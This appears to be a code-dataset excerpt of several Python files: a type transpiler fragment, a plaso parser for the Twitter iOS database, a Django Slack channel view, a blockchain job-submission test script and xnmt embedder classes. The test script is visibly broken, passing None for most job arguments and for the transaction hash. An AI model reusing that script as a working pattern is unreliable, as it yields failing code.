in arg:\n type_string = \": {}\".format(Python3Transpiler.emit_type_name(arg[\"type\"]))\n else:\n type_string = \"\"\n\n arg_string = \"{}{}\".format(arg, type_string)\n argument_strings.append(arg_string)\n argument_string = \", \".join(argument_strings)\n string_list.append(argument_string)\n\n if return_type:\n return_type_string = \" -> {}\".format(return_type)\n else:\n return_type_string = \"\"\n\n # TODO: Add option to return.\n if leave_empty:\n string_list.append(\"):{}\\n\".format(return_type_string))\n else:\n string_list.append(\"):{}\\n{} pass\\n\\n\".format(return_type_string, prefix))\n\n return \"\".join(string_list)\n\n # TODO: Return type hint.\n @staticmethod\n def emit_type_name(type: str) -> str:\n type_hint = \"\"\n return type_hint\n\n type_mappings = MappingProxyType({\n \"int64\": \"int\",\n \"int32\": \"int\",\n \"string\": \"str\",\n \"boolean\": \"bool\",\n \"unordered_map\": \"dict\",\n \"list\": \"list\",\n \"array\": \"list\",\n \"tuple\": \"tuple\"\n })\n\n","sub_path":"transpilers/Python3Transpiler.py","file_name":"Python3Transpiler.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"309889841","text":"# -*- coding:utf-8 -*-\n\"\"\"Parser for Twitter on iOS 8+ database.\n\nSQLite database path:\n/private/var/mobile/Containers/Data/Application/Library/Caches/databases/\nSQLite database name: twitter.db\n\"\"\"\n\nfrom dfdatetime import posix_time as dfdatetime_posix_time\n\nfrom plaso.containers import events\nfrom plaso.containers import time_events\nfrom plaso.lib import eventdata\nfrom plaso.parsers import sqlite\nfrom plaso.parsers.sqlite_plugins import interface\n\n\nclass TwitterIOSContactEventData(events.EventData):\n \"\"\"Twitter on iOS 8+ contact event data.\n\n Attributes:\n description (str): description of the profile.\n followers_count (int): number of accounts following the contact.\n following_count (int): number of accounts the contact is following.\n following (int): 1 if the contact is following the user's account, 0 if not.\n location (str): location of the profile.\n name (str): name of the profile.\n profile_url (str): URL of the profile picture.\n screen_name (str): screen name.\n url (str): URL of the profile.\n \"\"\"\n\n DATA_TYPE = u'twitter:ios:contact'\n\n def __init__(self):\n \"\"\"Initializes event data.\"\"\"\n super(TwitterIOSContactEventData, self).__init__(data_type=self.DATA_TYPE)\n self.description = None\n self.followers_count = None\n self.following = None\n self.following_count = None\n self.location = None\n self.name = None\n self.profile_url = None\n self.screen_name = None\n self.url = None\n\n\nclass TwitterIOSStatusEventData(events.EventData):\n \"\"\"Parent class for Twitter on iOS 8+ status events.\n\n Attributes:\n favorite_count (int): number of times the status message has been favorited.\n favorited (int): value to mark status as favorite by the account.\n name (str): user's profile name.\n retweet_count (str): number of times the status message has been retweeted.\n text (str): content of the status messsage.\n user_id (int): user unique identifier.\n \"\"\"\n\n DATA_TYPE = u'twitter:ios:status'\n\n def __init__(self):\n \"\"\"Initializes event data.\"\"\"\n super(TwitterIOSStatusEventData, self).__init__(data_type=self.DATA_TYPE)\n self.favorite_count = None\n self.favorited = None\n self.name = None\n self.retweet_count = None\n self.text = None\n self.user_id = None\n\n\nclass TwitterIOSPlugin(interface.SQLitePlugin):\n \"\"\"Parser for Twitter on iOS 8+ database.\"\"\"\n\n NAME = u'twitter_ios'\n DESCRIPTION = u'Parser for Twitter on iOS 8+ database'\n\n QUERIES = [\n ((u'SELECT createdDate, updatedAt, screenName, name, profileImageUrl,'\n u'location, description, url, following, followersCount, followingCount'\n u' FROM Users ORDER BY createdDate'), u'ParseContactRow'),\n ((u'SELECT Statuses.date AS date, Statuses.text AS text, Statuses.userId '\n u'AS user_id, Users.name AS name, Statuses.retweetCount AS '\n u'retweetCount, Statuses.favoriteCount AS favoriteCount, '\n u'Statuses.favorited AS favorited, Statuses.updatedAt AS updatedAt '\n u'FROM Statuses LEFT join Users ON Statuses.userId = Users.id ORDER '\n u'BY date'), u'ParseStatusRow')]\n\n REQUIRED_TABLES = frozenset([\n u'Lists', u'MyRetweets', u'StatusesShadow', u'UsersShadow',\n u'ListsShadow', u'Statuses', u'Users'])\n\n def ParseContactRow(self, parser_mediator, row, query=None, **unused_kwargs):\n \"\"\"Parses a contact row from the database.\n\n Args:\n parser_mediator (ParserMediator): mediates interactions between parsers\n and other components, such as storage and dfvfs.\n row (sqlite3.Row): row resulting from query.\n query (Optional[str]): query.\n \"\"\"\n # Note that pysqlite does not accept a Unicode string in row['string'] and\n # will raise \"IndexError: Index must be int or string\".\n\n event_data = TwitterIOSContactEventData()\n event_data.description = row['description']\n event_data.followers_count = row['followersCount']\n event_data.following = row['following']\n event_data.following_count = row['followingCount']\n event_data.location = row['location']\n event_data.name = row['name']\n event_data.profile_url = row['profileImageUrl']\n event_data.query = query\n event_data.screen_name = row['screenName']\n event_data.url = row['url']\n\n timestamp = row['createdDate']\n if timestamp:\n # Convert the floating point value to an integer.\n timestamp = int(timestamp)\n date_time = dfdatetime_posix_time.PosixTime(timestamp=timestamp)\n event = time_events.DateTimeValuesEvent(\n date_time, eventdata.EventTimestamp.CREATION_TIME)\n parser_mediator.ProduceEventWithEventData(event, event_data)\n\n timestamp = row['updatedAt']\n if timestamp:\n # Convert the floating point value to an integer.\n timestamp = int(timestamp)\n date_time = dfdatetime_posix_time.PosixTime(timestamp=timestamp)\n event = time_events.DateTimeValuesEvent(\n date_time, eventdata.EventTimestamp.UPDATE_TIME)\n parser_mediator.ProduceEventWithEventData(event, event_data)\n\n def ParseStatusRow(self, parser_mediator, row, query=None, **unused_kwargs):\n \"\"\"Parses a contact row from the database.\n\n Args:\n parser_mediator (ParserMediator): mediates interactions between parsers\n and other components, such as storage and dfvfs.\n row (sqlite3.Row): row resulting from query.\n query (Optional[str]): query.\n \"\"\"\n # Note that pysqlite does not accept a Unicode string in row['string'] and\n # will raise \"IndexError: Index must be int or string\".\n\n event_data = TwitterIOSStatusEventData()\n event_data.favorite_count = row['favoriteCount']\n event_data.favorited = row['favorited']\n event_data.name = row['name']\n event_data.query = query\n event_data.retweet_count = row['retweetCount']\n event_data.text = row['text']\n event_data.user_id = row['user_id']\n\n timestamp = row['date']\n if timestamp:\n # Convert the floating point value to an integer.\n timestamp = int(timestamp)\n date_time = dfdatetime_posix_time.PosixTime(timestamp=timestamp)\n event = time_events.DateTimeValuesEvent(\n date_time, eventdata.EventTimestamp.CREATION_TIME)\n parser_mediator.ProduceEventWithEventData(event, event_data)\n\n timestamp = row['updatedAt']\n if timestamp:\n # Convert the floating point value to an integer.\n timestamp = int(timestamp)\n date_time = dfdatetime_posix_time.PosixTime(timestamp=timestamp)\n event = time_events.DateTimeValuesEvent(\n date_time, eventdata.EventTimestamp.UPDATE_TIME)\n parser_mediator.ProduceEventWithEventData(event, event_data)\n\n\nsqlite.SQLiteParser.RegisterPlugin(TwitterIOSPlugin)\n","sub_path":"plaso/parsers/sqlite_plugins/twitter_ios.py","file_name":"twitter_ios.py","file_ext":"py","file_size_in_byte":6683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"600520200","text":"import requests\n\nfrom chatrender.conf import settings\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.shortcuts import render\n\n\n@staff_member_required\ndef channels(request, chat_type):\n response = requests.get('{}?chat_type={}'.format(\n settings.SLACKCHAT_CHANNEL_ENDPOINT,\n chat_type,\n ))\n channels = response.json()\n return render(\n request,\n 'chatrender/channel_list.html',\n context={\"channels\": channels, \"chat_type\": chat_type}\n )\n","sub_path":"chatrender/views/channels.py","file_name":"channels.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"391486515","text":"#!/usr/bin/env python3\n\nimport math\nimport time\nfrom os.path import expanduser\nfrom random import randint\n\nimport eblocbroker.Contract as Contract\nfrom imports import connect_to_web3\nfrom utils import is_transaction_passed, sleep_timer\n\nhome = expanduser(\"~\")\nw3 = connect_to_web3()\nEbb = Contract.eblocbroker\n\n\nf = open(f\"{home}/TESTS/accountPassword.txt\", \"r\") # password read from the file\naccountPassword = f.read().strip()\nf.close()\n\n\ndef log(my_string, path, print_flag=0):\n if print_flag == 0:\n print(my_string)\n\n f = open(f\"{path}/clientOutput.txt\", \"a\")\n f.write(my_string + \"\\n\")\n f.close()\n\n\ndef testFunc(path, readTest, testType, providerID, cacheType):\n with open(path + \"/\" + readTest) as test:\n for idx, line in enumerate(test):\n if idx != 0:\n log(\"\\n------------------------------------------\", path)\n\n eudatFlag = 0\n if testType == \"eudat-nasa\":\n cloudStorageID = 1\n eudatFlag = 0\n elif testType == \"eudat-nas\":\n cloudStorageID = 1\n eudatFlag = 1\n elif testType == \"ipfs\":\n cloudStorageID = 0\n elif testType == \"gdrive\":\n cloudStorageID = 4\n\n dataTransferIn = 10\n dataTransferOut = 10\n gasStorageHour = 0\n\n jobKey = line.rstrip().split(\" \")\n sourceCodeHash = jobKey[5] # time to sleep in seconds\n sleepTime = jobKey[6] # time to sleep in seconds\n block_number = Ebb.get_block_number()\n\n log(\n \"Job: \" + str(idx + 1) + \"| Current Time: \" + time.ctime() + \"| BlockNumber: \" + str(block_number),\n path,\n )\n log(\"Nasa Submit range: \" + jobKey[3] + \" \" + jobKey[4], path)\n log(\"Sleep Time to submit next job: \" + sleepTime, path)\n log(\"Sourcecode Hash=\" + sourceCodeHash, path)\n jobKey_ = str(jobKey[0])\n coreNum = int(jobKey[2])\n if eudatFlag == 0:\n coreMinuteGas = int(math.ceil(float(jobKey[1]) / 60))\n log(\"RunTimeInMinutes: \" + str(coreMinuteGas), path)\n else:\n log(\"RunTimeInMinutes: \" + \"360\", path)\n coreMinuteGas = 360 # 6 hours for nasEUDAT simulation test.\n\n account_id = randint(0, 9)\n output = w3.personal.unlockAccount(\n w3.eth.accounts[account_id], accountPassword\n ) # unlocks the selected account in case if unlocks over time\n log(\n \"AccountID:\" + str(account_id) + \" (\" + w3.eth.accounts[account_id] + \") is unlocked=>\" + str(output),\n path,\n )\n log(\n \"hash=\"\n + jobKey[0]\n + \"| TimeToRun=\"\n + str(coreMinuteGas)\n + \"| TimeToRunSeconds=\"\n + str(math.ceil(float(jobKey[1])))\n + \"| Core=\"\n + str(coreNum)\n + \"| account_id=\"\n + str(account_id),\n path,\n )\n\n log(\n \"submit_job(\"\n + providerID\n + \", \"\n + jobKey_\n + \", \"\n + str(coreNum)\n + \", \"\n + str(coreMinuteGas)\n + \", \"\n + str(dataTransferIn)\n + \", \"\n + str(dataTransferOut)\n + \", \"\n + str(cloudStorageID)\n + \", \"\n + jobKey_\n + \", \"\n + str(gasStorageHour)\n + \", \"\n + str(account_id)\n + \")\",\n path,\n )\n\n provider = None\n core_list = None\n run_time = None\n cloudStorageID = None\n sourceCodeHash_list = None\n cacheHour_list = None\n account_id = None\n job_price = None\n output = Ebb.submit_job(\n provider,\n jobKey,\n core_list,\n run_time,\n dataTransferIn,\n dataTransferOut,\n cloudStorageID,\n sourceCodeHash_list,\n cacheType,\n cacheHour_list,\n account_id,\n job_price,\n )\n\n # # ret = submit_job(providerID, jobKey_, int(coreNum), coreMinuteGas, dataTransferIn, dataTransferOut, cloudStorageID, sourceCodeHash, cacheType, gasStorageHour, account_id) # delete\n # success = None\n # if not success:\n # log(output, path, 0)\n # else:\n # tx_hash = output[0]\n # log(\"tx_hash:\" + tx_hash, path, 0)\n # log(\"computationalCost:\" + output[1], path, 0)\n # log(\"storageCost:\" + output[2], path, 0)\n # log(\"cacheCost:\" + output[3], path, 0)\n # log(\"dataTransferCost:\" + output[4], path, 0)\n # log(\"job_price:\" + output[5], path, 1)\n tx_hash = None\n txFile = open(path + \"/\" + providerID + \".txt\", \"a\")\n txFile.write(output[0] + \" \" + str(account_id) + \"\\n\")\n txFile.close()\n sleep_timer(int(sleepTime))\n receipt = w3.eth.getTransactionReceipt(tx_hash)\n if receipt:\n output = is_transaction_passed(w3, tx_hash)\n log(f\"tx status:{output}\", path)\n else:\n log(\"tx is not deployed yet\", path)\n\n log(\"END\", path)\n log(\".\", path)\n f.close()\n","sub_path":"test/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"71284995","text":"import numbers\nimport functools\nimport collections\n\nfrom typing import Any, Optional, Union\n\nimport numpy as np\nimport dynet as dy\n\nimport xnmt.param_initializers as pinit\nimport xnmt.sent as sent\nimport xnmt.vocabs as vocabs\nimport xnmt.input_readers as input_readers\nimport xnmt.batchers as batchers\nimport xnmt.events as events\nimport xnmt.expression_seqs as expression_seqs\nimport xnmt.modelparts.transforms as transforms\nimport xnmt.param_collections as param_collections\nimport xnmt.seq_composer as seq_composer\n\nfrom xnmt import logger\nfrom xnmt.persistence import bare, Path, Ref, Serializable, serializable_init\n\n\nclass Embedder(object):\n \"\"\"\n An embedder takes in word IDs and outputs continuous vectors.\n\n This can be done on a word-by-word basis, or over a sequence.\n \"\"\"\n\n def embed(self, word: Any) -> dy.Expression:\n \"\"\"Embed a single word.\n\n Args:\n word: This will generally be an integer word ID, but could also be something like a string. It could\n also be batched, in which case the input will be a :class:`xnmt.batcher.Batch` of integers or other things.\n\n Returns:\n Expression corresponding to the embedding of the word(s).\n \"\"\"\n raise NotImplementedError('embed must be implemented in Embedder subclasses')\n\n def embed_sent(self, x: Any) -> expression_seqs.ExpressionSequence:\n \"\"\"Embed a full sentence worth of words. By default, just do a for loop.\n\n Args:\n x: This will generally be a list of word IDs, but could also be a list of strings or some other format.\n It could also be batched, in which case it will be a (possibly masked) :class:`xnmt.batcher.Batch` object\n\n Returns:\n An expression sequence representing vectors of each word in the input.\n \"\"\"\n # single mode\n if not batchers.is_batched(x):\n expr = expression_seqs.ExpressionSequence(expr_list=[self.embed(word) for word in x])\n # minibatch mode\n elif type(self) == LookupEmbedder:\n embeddings = []\n for word_i in range(x.sent_len()):\n batch = batchers.mark_as_batch([single_sent[word_i] for single_sent in x])\n embeddings.append(self.embed(batch))\n expr = expression_seqs.ExpressionSequence(expr_list=embeddings, mask=x.mask)\n else:\n assert type(x[0]) == sent.SegmentedSentence, \"Need to use CharFromWordTextReader for non standard embeddings.\"\n embeddings = []\n all_embeddings = []\n for sentence in x:\n embedding = []\n for i in range(sentence.len_unpadded()):\n embed_word = self.embed(sentence.words[i])\n embedding.append(embed_word)\n all_embeddings.append(embed_word)\n embeddings.append(embedding)\n # Useful when using dy.autobatch\n dy.forward(all_embeddings)\n all_embeddings.clear()\n # Pad the results\n expr = batchers.pad_embedding(embeddings)\n\n return expr\n\n\n def choose_vocab(self,\n vocab: vocabs.Vocab,\n yaml_path: Path,\n src_reader: input_readers.InputReader,\n trg_reader: input_readers.InputReader) -> vocabs.Vocab:\n \"\"\"Choose the vocab for the embedder basd on the passed arguments\n\n This is done in order of priority of vocab, model+yaml_path\n\n Args:\n vocab: If None, try to obtain from ``src_reader`` or ``trg_reader``, depending on the ``yaml_path``\n yaml_path: Path of this embedder in the component hierarchy. Automatically determined when deserializing the YAML model.\n src_reader: Model's src_reader, if exists and unambiguous.\n trg_reader: Model's trg_reader, if exists and unambiguous.\n\n Returns:\n chosen vocab\n \"\"\"\n if vocab is not None:\n return len(vocab)\n elif \"src_embedder\" in yaml_path:\n if src_reader is None or src_reader.vocab is None:\n raise ValueError(\"Could not determine src_embedder's vocabulary. Please set its vocab member explicitly, or specify the vocabulary of src_reader ahead of time.\")\n return len(src_reader.vocab)\n elif \"embedder\" in yaml_path or \"output_projector\" in yaml_path:\n if trg_reader is None or trg_reader.vocab is None:\n raise ValueError(\"Could not determine trg_embedder's vocabulary. Please set its vocab member explicitly, or specify the vocabulary of trg_reader ahead of time.\")\n return len(trg_reader.vocab)\n else:\n raise ValueError(\"Attempted to determine vocab size of {} (path: {}), but path was not src_embedder, trg_embedder, or output_projector, so it could not determine what part of the model to use. Please set vocab_size or vocab explicitly.\".format(self.__class__, yaml_path))\n\n def choose_vocab_size(self,\n vocab_size: numbers.Integral,\n vocab: vocabs.Vocab,\n yaml_path: Path,\n src_reader: input_readers.InputReader,\n trg_reader: input_readers.InputReader) -> int:\n \"\"\"Choose the vocab size for the embedder based on the passed arguments\n\n This is done in order of priority of vocab_size, vocab, model+yaml_path\n\n Args:\n vocab_size : vocab size or None\n vocab: vocab or None\n yaml_path: Path of this embedder in the component hierarchy. Automatically determined when YAML-deserializing.\n src_reader: Model's src_reader, if exists and unambiguous.\n trg_reader: Model's trg_reader, if exists and unambiguous.\n\n Returns:\n chosen vocab size\n \"\"\"\n if vocab_size is not None:\n return vocab_size\n elif vocab is not None:\n return len(vocab)\n elif \"src_embedder\" in yaml_path:\n if src_reader is None or getattr(src_reader,\"vocab\",None) is None:\n raise ValueError(\"Could not determine src_embedder's size. \"\n \"Please set its vocab_size or vocab member explicitly, or specify the vocabulary of src_reader ahead of time.\")\n return len(src_reader.vocab)\n elif \"embedder\" in yaml_path or \"output_projector\" in yaml_path:\n if trg_reader is None or trg_reader.vocab is None:\n raise ValueError(\"Could not determine target embedder's size. \"\n \"Please set its vocab_size or vocab member explicitly, or specify the vocabulary of trg_reader ahead of time.\")\n return len(trg_reader.vocab)\n else:\n raise ValueError(f\"Attempted to determine vocab size of {self.__class__} (path: {yaml_path}), \"\n f\"but path was not src_embedder, decoder.embedder, or output_projector, so it could not determine what part of the model to use. \"\n f\"Please set vocab_size or vocab explicitly.\")\n\n\nclass WordEmbedder(Embedder):\n \"\"\"\n Word embeddings via full matrix.\n\n Args:\n emb_dim: embedding dimension\n weight_noise: apply Gaussian noise with given standard deviation to embeddings\n fix_norm: fix the norm of word vectors to be radius r, see https://arxiv.org/abs/1710.01329\n \"\"\"\n\n @events.register_xnmt_handler\n def __init__(self,\n emb_dim: int,\n weight_noise: float,\n fix_norm: Optional[float] = None):\n self.fix_norm = fix_norm\n self.weight_noise = weight_noise\n self.emb_dim = emb_dim\n self.train = True\n\n @events.handle_xnmt_event\n def on_set_train(self, val: bool) -> None:\n self.train = val\n\n def embed(self, x: Union[batchers.Batch, numbers.Integral]) -> dy.Expression:\n \"\"\"\n Embed a single word in a sentence.\n :param x: A word id.\n :return: Embedded word.\n \"\"\"\n ret = self._embed_word(x, batchers.is_batched(x))\n ## Applying Fix normalization\n if self.fix_norm is not None:\n ret = dy.cdiv(ret, dy.l2_norm(ret)) * self.fix_norm\n ## Weight noise only when training\n if self.train and self.weight_noise > 0.0:\n ret = dy.noise(ret, self.weight_noise)\n return ret\n\n def _embed_word(self, word, is_batched):\n raise NotImplementedError()\n\n\nclass LookupEmbedder(WordEmbedder, transforms.Linear, Serializable):\n\n yaml_tag = '!LookupEmbedder'\n\n @serializable_init\n def __init__(self,\n emb_dim: int = Ref(\"exp_global.default_layer_dim\"),\n vocab_size: Optional[int] = None,\n vocab: Optional[vocabs.Vocab] = None,\n yaml_path: Path = Path(''),\n src_reader: Optional[input_readers.InputReader] = Ref(\"model.src_reader\", default=None),\n trg_reader: Optional[input_readers.InputReader] = Ref(\"model.trg_reader\", default=None),\n is_dense: bool = False,\n param_init: pinit.ParamInitializer = Ref(\"exp_global.param_init\", default=bare(pinit.GlorotInitializer)),\n bias_init: pinit.ParamInitializer = Ref(\"exp_global.bias_init\", default=bare(pinit.ZeroInitializer)),\n init_fastext: Optional[str] = None,\n weight_noise: float = Ref(\"exp_global.weight_noise\", default=0.0),\n fix_norm: Optional[float] = None):\n super().__init__(emb_dim=emb_dim, weight_noise=weight_noise, fix_norm=fix_norm)\n # Embedding Parameters\n pcol = param_collections.ParamManager.my_params(self)\n self.vocab_size = self.choose_vocab_size(vocab_size, vocab, yaml_path, src_reader, trg_reader)\n emb_mtr_dim = (self.vocab_size, self.emb_dim)\n\n if init_fastext is not None:\n logger.info(\"Setting Dense to False because of init_fastext\")\n is_dense = False\n\n if not is_dense:\n if init_fastext is not None:\n self.embeddings = pcol.lookup_parameters_from_numpy(self._read_fasttext_embeddings(vocab, init_fastext))\n else:\n self.embeddings = pcol.add_lookup_parameters(emb_mtr_dim, init=param_init.initializer(emb_mtr_dim, is_lookup=True))\n else:\n self.embeddings = pcol.add_parameters(emb_mtr_dim, init=param_init.initializer(emb_mtr_dim, is_lookup=True))\n self.bias = pcol.add_parameters((self.vocab_size,), init=bias_init.initializer((self.vocab_size,)))\n\n # Model States\n self.is_dense = is_dense\n self.train = False\n self.save_processed_arg(\"vocab_size\", self.vocab_size)\n\n def _embed_word(self, word, is_batched):\n if is_batched:\n embedding = dy.pick_batch(self.embeddings, word) if self.is_dense else self.embeddings.batch(word)\n else:\n embedding = dy.pick(self.embeddings, index=word) if self.is_dense else self.embeddings[word]\n return embedding\n\n def transform(self, input_expr: dy.Expression) -> dy.Expression:\n if self.is_dense:\n w = dy.parameter(self.embeddings)\n b = dy.parameter(self.bias)\n else:\n raise NotImplementedError(\"Non dense embedder transform is not implemented yet.\")\n\n return dy.affine_transform([b, w, input_expr])\n\n def _read_fasttext_embeddings(self, vocab: vocabs.Vocab, init_fastext):\n \"\"\"\n Reads FastText embeddings from a file. Also prints stats about the loaded embeddings for sanity checking.\n\n Args:\n vocab: a `Vocab` object containing the vocabulary for the experiment\n embeddings_file_handle: A file handle on the embeddings file. The embeddings must be in FastText text\n format.\n Returns:\n tuple: A tuple of (total number of embeddings read, # embeddings that match vocabulary words, # vocabulary words\n without a matching embedding, embeddings array).\n \"\"\"\n with open(init_fastext, encoding='utf-8') as embeddings_file_handle:\n _, dimension = next(embeddings_file_handle).split()\n if int(dimension) != self.emb_dim:\n raise Exception(f\"An embedding size of {self.emb_dim} was specified, but the pretrained embeddings have size {dimension}\")\n\n # Poor man's Glorot initializer for missing embeddings\n bound = np.sqrt(6/(self.vocab_size + self.emb_dim))\n\n total_embs = 0\n in_vocab = 0\n missing = 0\n\n embeddings = np.empty((self.vocab_size, self.emb_dim), dtype='float')\n found = np.zeros(self.vocab_size, dtype='bool_')\n\n for line in embeddings_file_handle:\n total_embs += 1\n word, vals = line.strip().split(' ', 1)\n if word in vocab.w2i:\n in_vocab += 1\n index = vocab.w2i[word]\n embeddings[index] = np.fromstring(vals, sep=\" \")\n found[index] = True\n\n for i in range(self.vocab_size):\n if not found[i]:\n missing += 1\n embeddings[i] = np.random.uniform(-bound, bound, self.emb_dim)\n\n logger.info(f\"{in_vocab} vocabulary matches out of {total_embs} total embeddings; \"\n f\"{missing} vocabulary words without a pretrained embedding out of {self.vocab_size}\")\n\n return embeddings\n\n\nclass BagOfWordsEmbedder(WordEmbedder, Serializable):\n\n yaml_tag = '!BagOfWordsEmbedder'\n ONE_MB = 1000 * 1024\n\n @serializable_init\n def __init__(self,\n emb_dim = Ref(\"exp_global.default_layer_dim\"),\n ngram_vocab: vocabs.Vocab = None,\n word_vocab: Optional[vocabs.Vocab] = Ref(\"model.src_reader.vocab\", default=None),\n char_vocab: Optional[vocabs.Vocab] = Ref(\"model.src_reader.char_vocab\", default=None),\n ngram_size: int = 1,\n transform: Optional[transforms.Transform] = None,\n include_lower_ngrams: bool = True,\n weight_noise: float = Ref(\"exp_global.weight_noise\", default=0.0),\n fix_norm: Optional[float] = None):\n super().__init__(emb_dim=emb_dim, weight_noise=weight_noise, fix_norm=fix_norm)\n self.transform = self.add_serializable_component(\"transform\", transform,\n lambda: transforms.NonLinear(input_dim=ngram_vocab.vocab_size(),\n output_dim=emb_dim,\n activation='relu'))\n self.word_vocab = word_vocab\n self.char_vocab = char_vocab\n self.ngram_vocab = ngram_vocab\n self.ngram_size = ngram_size\n self.include_lower_ngrams = include_lower_ngrams\n\n @functools.lru_cache(maxsize=ONE_MB)\n def to_ngram_stats(self, word):\n word_vector = collections.defaultdict(int)\n\n if self.word_vocab is not None:\n chars = self.word_vocab[word]\n elif self.char_vocab is not None:\n chars = \"\".join([self.char_vocab[c] for c in word if c != self.char_vocab.PAD and c != self.char_vocab.SS])\n else:\n raise ValueError(\"Either word vocab or char vocab should not be None\")\n\n # This offset is used to generate bag-of-words for a specific ngrams only\n # For example 3-grams which is used in some papers\n offset = self.ngram_size-1 if not self.include_lower_ngrams else 0\n\n # Fill in word_vecs\n for i in range(len(chars)):\n for j in range(i+offset, min(i+self.ngram_size, len(chars))):\n word_vector[chars[i:j+1]] += 1\n\n return word_vector\n\n def _embed_word(self, segmented_word, is_batched):\n if self.word_vocab is not None:\n ngram_stats = self.to_ngram_stats(segmented_word.word)\n elif self.char_vocab is not None:\n ngram_stats = self.to_ngram_stats(segmented_word.chars)\n else:\n raise ValueError(\"Either word vocab or char vocab should not be None\")\n\n not_in = [key for key in ngram_stats.keys() if key not in self.ngram_vocab.w2i]\n for key in not_in:\n ngram_stats.pop(key)\n\n if len(ngram_stats) > 0:\n ngrams = [self.ngram_vocab.convert(ngram) for ngram in ngram_stats.keys()]\n counts = list(ngram_stats.values())\n else:\n ngrams = [self.ngram_vocab.UNK]\n counts = [1]\n\n input_tensor = dy.sparse_inputTensor([ngrams], counts, (self.ngram_vocab.vocab_size(),))\n # Note: If one wants to use CHARAGRAM embeddings, use NonLinear with Relu.\n return self.transform.transform(input_tensor)\n\n\nclass CharCompositionEmbedder(WordEmbedder, Serializable):\n\n yaml_tag = '!CharCompositionEmbedder'\n\n @serializable_init\n def __init__(self,\n char_vocab: Optional[vocabs.CharVocab] = Ref(\"model.src_reader.char_vocab\", default=None),\n vocab_size: Optional[int] = None,\n emb_dim: int = Ref(\"exp_global.default_layer_dim\"),\n weight_noise: float = Ref(\"exp_global.weight_noise\", default=0.0),\n param_init: pinit.ParamInitializer = Ref(\"exp_global.param_init\", default=bare(pinit.GlorotInitializer)),\n bias_init: pinit.ParamInitializer = Ref(\"exp_global.bias_init\", default=bare(pinit.ZeroInitializer)),\n composer: seq_composer.SequenceComposer = bare(seq_composer.SumComposer),\n fix_norm: Optional[float] = None):\n super().__init__(emb_dim=emb_dim, weight_noise=weight_noise, fix_norm=fix_norm)\n self.composer = composer\n # Embedding Parameters\n pcol = param_collections.ParamManager.my_params(self)\n self.vocab_size = self.choose_vocab_size(vocab_size, char_vocab, '', None, None)\n self.embeddings = pcol.add_lookup_parameters((self.vocab_size, self.emb_dim), init=param_init.initializer((self.vocab_size, self.emb_dim), is_lookup=True))\n # Model States\n self.train = False\n self.save_processed_arg(\"vocab_size\", self.vocab_size)\n\n\n def _embed_word(self, word: sent.SegmentedWord, is_batched: bool = False):\n char_embeds = self.embeddings.batch(batchers.mark_as_batch(word.chars))\n\n char_embeds = [dy.pick_batch_elem(char_embeds, i) for i in range(len(word.chars))]\n return self.composer.compose(char_embeds)\n\n\nclass CompositeEmbedder(Embedder, Serializable):\n yaml_tag = '!CompositeEmbedder'\n\n @serializable_init\n def __init__(self, embedders):\n self.embedders = embedders\n\n def embed_sent(self, x: Any):\n embeddings = [embedder.embed_sent(x) for embedder in self.embedders]\n ret = []\n for j in range(len(embeddings[0])):\n ret.append(dy.esum([embeddings[i][j] for i in range(len(embeddings))]))\n return expression_seqs.ExpressionSequence(expr_list=ret, mask=embeddings[0].mask)\n\n def embed(self, word: Any) -> dy.Expression:\n def select_word(_word, _embedder):\n if type(_word) == sent.SegmentedWord and type(_embedder) == LookupEmbedder:\n _word = _word.word\n return _word\n\n return dy.esum([embedder.embed(select_word(word, embedder)) for embedder in self.embedders])\n\n\nclass NoopEmbedder(Embedder, Serializable):\n \"\"\"\n This embedder performs no lookups but only passes through the inputs.\n\n Normally, the input is a Sentence object, which is converted to an expression.\n\n Args:\n emb_dim: Size of the inputs\n \"\"\"\n\n yaml_tag = '!NoopEmbedder'\n\n @serializable_init\n def __init__(self, emb_dim: Optional[numbers.Integral]) -> None:\n self.emb_dim = emb_dim\n\n def embed(self, x: Union[np.ndarray, list]) -> dy.Expression:\n return dy.inputTensor(x, batched=batchers.is_batched(x))\n\n def embed_sent(self, x: sent.Sentence) -> expression_seqs.ExpressionSequence:\n # TODO refactor: seems a bit too many special cases that need to be distinguished\n batched = batchers.is_batched(x)\n first_sent = x[0] if batched else x\n if hasattr(first_sent, \"get_array\"):\n if not batched:\n return expression_seqs.LazyNumpyExpressionSequence(lazy_data=x.get_array())\n else:\n return expression_seqs.LazyNumpyExpressionSequence(lazy_data=batchers.mark_as_batch([s for s in x]), mask=x.mask)\n else:\n if not batched:\n embeddings = [self.embed(word) for word in x]\n else:\n embeddings = []\n for word_i in range(x.sent_len()):\n embeddings.append(self.embed(batchers.mark_as_batch([single_sent[word_i] for single_sent in x])))\n return expression_seqs.ExpressionSequence(expr_list=embeddings, mask=x.mask)\n\n\nclass PositionEmbedder(Embedder, Serializable):\n\n yaml_tag = '!PositionEmbedder'\n\n @serializable_init\n def __init__(self,\n max_pos: numbers.Integral,\n emb_dim: numbers.Integral = Ref(\"exp_global.default_layer_dim\"),\n param_init: pinit.ParamInitializer = Ref(\"exp_global.param_init\", default=bare(pinit.GlorotInitializer))):\n \"\"\"\n max_pos: largest embedded position\n emb_dim: embedding size\n param_init: how to initialize embedding matrix\n \"\"\"\n self.max_pos = max_pos\n self.emb_dim = emb_dim\n param_collection = param_collections.ParamManager.my_params(self)\n dim = (self.emb_dim, max_pos)\n self.embeddings = param_collection.add_parameters(dim, init=param_init.initializer(dim, is_lookup=True))\n\n def embed(self, word): raise NotImplementedError(\"Position-embedding for individual words not implemented yet.\")\n def embed_sent(self, sent_len: numbers.Integral) -> expression_seqs.ExpressionSequence:\n embeddings = dy.strided_select(dy.parameter(self.embeddings), [1,1], [0,0], [self.emb_dim, sent_len])\n return expression_seqs.ExpressionSequence(expr_tensor=embeddings, mask=None)\n\n\n","sub_path":"xnmt/modelparts/embedders.py","file_name":"embedders.py","file_ext":"py","file_size_in_byte":20742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"449438702","text":"# 